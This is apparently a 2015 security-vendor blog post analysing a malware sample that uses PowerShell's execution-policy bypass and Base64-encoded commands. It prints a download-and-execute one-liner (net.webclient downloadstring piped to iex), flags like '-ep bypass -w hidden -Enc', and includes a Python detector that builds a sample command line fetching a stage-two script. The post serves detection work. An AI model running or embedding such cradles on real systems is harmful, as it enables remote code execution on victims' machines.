Monday, September 14, 2015

Using powershell as an infection vector

It's been a bit quiet on our blog over the past weeks while we have been busy implementing new features and analyzing samples we come across on our public webservice (which has a new domain called reverse.it, by the way).

Bypassing Powershell's Execution Policy



About two weeks ago we came across an interesting sample that was uploaded to our public webservice (and, as the 'Do not share' button was not checked, also shared with VirusTotal)*. It uses powershell.exe to bypass the execution policy (see the -ep bypass part of the command line) and it also uses the -Enc parameter to pass the expression to be invoked as a Base64 encoded string. To be precise, it tries to download a script from a URL and execute it with an 'Invoke-Expression' (iex) call. Here is the syntax:

$w=new-object net.webclient;$w.UseDefaultCredentials=$true;$w.Proxy.Credentials=$w.Credentials;iex($w.downloadstring('<URL>'))

See also the following screenshot from our report, which quite nicely detects this code snippet:


While this kind of bypassing trick doesn't seem to be particularly new (see this excellent blogpost), it was the first time we saw it on our webservice and we thought it would be a good idea to draw some attention to these kinds of tricks. You may have noticed in the screenshot above that, while the Base64 artifact detection is not yet perfect, we do extract the most significant portion as part of the command line and feed the result back into the signature interface. This ends up triggering all kinds of other signatures, e.g. the URL regex pattern signature:
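As an added example (not code from the original post or from the Hybrid Analysis product), here is a small Python decoder in the spirit of the Base64 artifact extraction described above: it locates the -Enc argument on a powershell.exe command line, decodes it as UTF-16LE Base64 (the encoding -EncodedCommand expects), and then runs simple URL / iex / downloader checks over the decoded script. The sample command line and the example.invalid URL are constructed for this example.

```python
import base64
import binascii
import re

# Constructed sample: the downloader snippet from the post with a placeholder
# URL, wrapped in a command line shaped like the one the sample used.
SAMPLE_SCRIPT = (
    "$w=new-object net.webclient;$w.UseDefaultCredentials=$true;"
    "$w.Proxy.Credentials=$w.Credentials;"
    "iex($w.downloadstring('http://example.invalid/stage2.ps1'))"
)

def encode_command(script):
    """-EncodedCommand takes the script as UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

SAMPLE_CMDLINE = "powershell.exe -ep bypass -w hidden -Enc " + encode_command(SAMPLE_SCRIPT)

# powershell.exe accepts unambiguous prefixes, so -e, -en, -enc and -ec all mean
# -EncodedCommand, and -ep / -ex... mean -ExecutionPolicy.
def _is_enc_flag(tok):
    rest = tok[1:].lower() if tok.startswith(("-", "/")) else ""
    return rest == "ec" or (len(rest) >= 1 and "encodedcommand".startswith(rest))

def _is_ep_flag(tok):
    rest = tok[1:].lower() if tok.startswith(("-", "/")) else ""
    return rest == "ep" or (len(rest) >= 2 and "executionpolicy".startswith(rest))

def decode_encoded_command(blob):
    """Reverse -EncodedCommand; returns None if the blob is not valid UTF-16LE Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None

URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
DOWNLOADER_RE = re.compile(r"downloadstring|net\.webclient", re.IGNORECASE)

def analyze_cmdline(cmdline):
    """Pull out the findings a sandbox signature would want from a powershell command line."""
    toks = cmdline.split()
    result = {"ep_bypass": False, "decoded": None, "urls": [], "iex": False, "downloader": False}
    for i, tok in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if _is_ep_flag(tok) and nxt.lower() in ("bypass", "unrestricted"):
            result["ep_bypass"] = True
        elif _is_enc_flag(tok) and nxt:
            result["decoded"] = decode_encoded_command(nxt)
    script = result["decoded"] or cmdline  # fall back to the raw line if nothing decoded
    result["urls"] = URL_RE.findall(script)
    result["iex"] = IEX_RE.search(script) is not None
    result["downloader"] = DOWNLOADER_RE.search(script) is not None
    return result
```

Running analyze_cmdline over process-creation logs (Sysmon event 1, for instance) gives the decoded script and URL so that the same signatures that fire on plain command lines also fire on the encoded form.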


If you would like to see more details (and a download link to the sample), here are two reports on 32-bit and 64-bit environments:

https://www.hybrid-analysis.com/sample/ad58df92e18fdc04a060a0fe09bf3697961a32599d19d0b4cc94fa7a1dd221b0?environmentId=4
https://www.hybrid-analysis.com/sample/ad58df92e18fdc04a060a0fe09bf3697961a32599d19d0b4cc94fa7a1dd221b0?environmentId=2

Conclusion


The fact that malware is "outsourcing" and utilizing Windows components is a general trend I think we are seeing (e.g. the latest rise in COM interface utilization). So staying up to date with state-of-the-art methods is a vital process and a mandatory requisite for any IT security product. If you have any interesting sample that you think we could do better on, please send us a quick note at support@payload-security.com.

* if you upload any file to our webservice, even if you do check the 'Do not share' checkbox, a public report will be generated nevertheless (just with the download link disabled and no VT upload, if unknown). Also, please note that when a sample has been uploaded to VT (and is thereby part of the public domain), we will not delete your report if the upload was unintentional and it contains relevant information for the IT-Sec industry.